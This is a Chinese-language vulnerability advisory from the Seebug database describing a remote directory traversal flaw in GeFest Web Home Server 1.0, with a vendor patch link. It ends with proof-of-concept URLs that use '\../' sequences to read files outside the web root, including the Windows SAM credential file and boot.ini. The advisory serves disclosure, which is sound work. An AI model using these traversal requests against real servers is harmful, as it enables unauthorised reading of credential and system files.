GeFest Web Home Server远程目录遍历漏洞

2010-02-09T00:00:00
ID SSV:19105
Type seebug
Reporter Root
Modified 2010-02-09T00:00:00

Description

BUGTRAQ ID: 38141

Gefest Web Home Server是设计有图形用户界面的简单web服务器。

远程攻击者可以通过向Gefest Web Home Serve提交特制URI请求执行目录遍历攻击,访问Web根目录外的文件。

GZM Web GeFest Web HomeServer 1.0 厂商补丁:

GZM Web

目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:

http://clearweb.org.ua/gefest/GefestWS_win_jre.exe

                                        
                                            
                                                http://192.168.1.200:8080/\../\../\../WINDOWS\SYSTEM32\calc.exe
http://192.168.1.200:8080/\../\../\../WINDOWS\SYSTEM32\config\sam
http://192.168.1.200:8080/\../\../\../WINDOWS\SYSTEM32
http://192.168.1.200:8080/\../\../\../boot.ini